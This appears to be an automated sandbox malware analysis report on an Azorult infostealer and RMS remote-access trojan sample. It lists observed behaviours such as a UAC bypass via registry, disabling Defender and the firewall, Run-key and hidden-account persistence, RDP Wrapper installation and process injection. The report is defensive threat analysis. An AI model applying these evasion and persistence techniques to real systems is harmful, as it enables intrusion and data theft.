Malware Analysis Report

2024-11-13 16:21

Sample ID 220516-x3zf7sgcaj
Target dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
SHA256 dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
Tags
azorult rms aspackv2 discovery evasion infostealer persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360

Threat Level: Known bad

The file dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360 was found to be: Known bad.

Malicious Activity Summary

azorult rms aspackv2 discovery evasion infostealer persistence rat trojan upx

Modifies visiblity of hidden/system files in Explorer

UAC bypass

Windows security bypass

RMS

Modifies Windows Defender Real-time Protection settings

Azorult

ACProtect 1.3x - 1.4x DLL software

Grants admin privileges

ASPack v2.12-2.42

Blocks application from running via registry modification

Stops running service(s)

Sets DLL path for service in the registry

UPX packed file

Sets file to hidden

Drops file in Drivers directory

Executes dropped EXE

Modifies Windows Firewall

Modifies file permissions

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Modifies WinLogon

Looks up external IP address via web service

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

AutoIT Executable

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Runs net.exe

Modifies registry class

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Gathers network information

System policy modification

Views/modifies file attributes

Suspicious behavior: LoadsDriver

Runs .reg file with regedit

Creates scheduled task(s)

Delays execution with timeout.exe

Kills process with taskkill

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: SetClipboardViewer

Suspicious behavior: EnumeratesProcesses

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-16 19:23

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-16 19:23

Reported

2022-05-16 19:32

Platform

win7-20220414-en

Max time kernel

155s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"

Signatures

Azorult

trojan infostealer azorult

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies visiblity of hidden/system files in Explorer

evasion

RMS

trojan rat rms

UAC bypass

evasion trojan

Windows security bypass

evasion trojan

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Modifies Windows Firewall

evasion

Sets DLL path for service in the registry

persistence

Sets file to hidden

evasion

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\winlog.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\winlog.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\winlog.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Programdata\RealtekHD\taskhostw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Cezurity C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\COMODO C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\AVG C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Zaxar C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\ByteFence C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Cezurity C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\ESET C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Launches sc.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1704 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 1704 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 1704 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 1704 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 1888 wrote to memory of 1764 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1888 wrote to memory of 1764 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1888 wrote to memory of 1764 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1888 wrote to memory of 1764 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1888 wrote to memory of 324 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1888 wrote to memory of 324 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1888 wrote to memory of 324 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1888 wrote to memory of 324 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1880 wrote to memory of 1736 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1880 wrote to memory of 1736 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1880 wrote to memory of 1736 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1880 wrote to memory of 1736 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 1704 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 1704 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
